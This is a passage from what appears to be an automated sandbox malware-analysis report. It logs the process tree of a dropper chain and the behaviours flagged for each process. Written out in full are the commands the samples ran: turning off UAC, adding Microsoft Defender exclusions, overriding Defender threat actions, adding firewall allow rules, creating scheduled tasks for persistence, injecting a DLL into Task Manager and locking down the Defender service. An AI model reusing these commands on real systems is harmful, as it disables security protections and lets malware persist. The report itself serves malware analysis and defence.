of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 1968 wrote to memory of 3324 1968 swiiii.exe 86 PID 2992 wrote to memory of 2316 2992 explorha.exe 87 PID 2992 wrote to memory of 2316 2992 explorha.exe 87 PID 2992 wrote to memory of 2796 2992 explorha.exe 171 PID 2992 wrote to memory of 2796 2992 explorha.exe 171 PID 2992 wrote to memory of 2796 2992 explorha.exe 171 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2796 wrote to memory of 4812 2796 gold.exe 90 PID 2316 wrote to memory of 3544 2316 file300un.exe 91 PID 2316 wrote to memory of 3544 2316 file300un.exe 91 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 2316 wrote to memory of 4964 2316 file300un.exe 93 PID 4964 wrote to memory of 2736 4964 regsvcs.exe 97 PID 4964 wrote to memory of 2736 4964 regsvcs.exe 97 PID 4964 wrote to memory of 2736 4964 regsvcs.exe 97 PID 4964 wrote to memory of 2888 4964 regsvcs.exe 98 PID 4964 wrote to memory of 2888 4964 regsvcs.exe 98 PID 4964 wrote to memory of 2888 4964 regsvcs.exe 98 PID 4964 wrote to memory of 2244 4964 regsvcs.exe 99 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe"C:\Users\Admin\AppData\Local\Temp\2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 8364⤵
- Program crash
PID:4636
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"3⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000073001\swiiii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4680
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe" -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"4⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Users\Admin\Pictures\b1nbwn523WEOir6D5RHSIeEr.exe"C:\Users\Admin\Pictures\b1nbwn523WEOir6D5RHSIeEr.exe"5⤵
- Executes dropped EXE
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\u240.0.exe"C:\Users\Admin\AppData\Local\Temp\u240.0.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\u240.1.exe"C:\Users\Admin\AppData\Local\Temp\u240.1.exe"6⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4680 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD17⤵PID:5568
-
-
-
-
C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"5⤵
- Executes dropped EXE
PID:2888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:4488
-
-
C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"C:\Users\Admin\Pictures\WNVWzyQ9U4x61stEDAP6lzkw.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5988
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:4188
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4568
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:724
-
-
-
-
C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"5⤵
- Executes dropped EXE
PID:2244 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5812
-
-
C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"C:\Users\Admin\Pictures\3QQWENYHN4zHu7XvvsSKZTYq.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:5508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5708
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:5984
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:3904
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2716
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe7⤵
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2164
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:652
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f8⤵PID:5176
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll8⤵PID:2196
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F8⤵
- Creates scheduled task(s)
PID:5976
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"8⤵PID:5824
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵PID:520
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)10⤵
- Launches sc.exe
PID:684
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"5⤵
- Executes dropped EXE
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5764 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2892
-
-
-
C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"C:\Users\Admin\Pictures\Ckl9TyIZXKdlKs1JCVsLffk7.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:5940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2556
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:2764
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:4476
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1200
-
-
-
-
C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"5⤵
- Executes dropped EXE
PID:2420 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Command and Scripting Interpreter: PowerShell
PID:5848
-
-
C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"C:\Users\Admin\Pictures\YYVxHJ2hAo7YMQ97pBCimtCf.exe"6⤵
- Windows security bypass
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4208
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"7⤵PID:3668
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes8⤵
- Modifies Windows Firewall
PID:5636
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2092
-
-
-
-
C:\Users\Admin\Pictures\smyDlk5Es9ywvt8vYzqP4xsg.exe"C:\Users\Admin\Pictures\smyDlk5Es9ywvt8vYzqP4xsg.exe"5⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1784
-
-
C:\Users\Admin\Pictures\w5WMABIkihlCRso1g89r14TE.exe"C:\Users\Admin\Pictures\w5WMABIkihlCRso1g89r14TE.exe"5⤵
- Executes dropped EXE
PID:4116 -
C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:5160 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:5256
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵PID:5304
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:5320
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:5332
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵PID:5348
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:5380
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:5404
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵PID:5464
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:5480
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:5492
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵PID:5508
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:5524
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:5536
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:5552
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:5568
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵PID:5824
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵PID:6140
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:5144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5212 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 22:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1C7C.tmp\Install.exe\" it /NhedidIXUK 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5684
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"7⤵PID:5740
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ8⤵PID:4232
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bbmnnUCIPYyTQrzMQJ9⤵PID:924
-
-
-
-
-
-
C:\Users\Admin\Pictures\EGijUa0yZwO1E3ULKTt8Y0Pe.exe"C:\Users\Admin\Pictures\EGijUa0yZwO1E3ULKTt8Y0Pe.exe"5⤵
- Executes dropped EXE
PID:5656 -
C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe.\Install.exe /ThYFdiduvbI "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:5728 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵PID:2868
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"8⤵PID:5584
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:5696
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 610⤵PID:5652
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"8⤵PID:588
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:5564
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 610⤵PID:5580
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"8⤵PID:5280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵PID:5296
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 610⤵PID:5292
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"8⤵PID:4628
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵PID:4488
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 610⤵PID:2884
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"8⤵PID:5660
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵PID:5976
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force10⤵
- Command and Scripting Interpreter: PowerShell
PID:6000 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force11⤵PID:4568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:1268
-
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵PID:6064
-
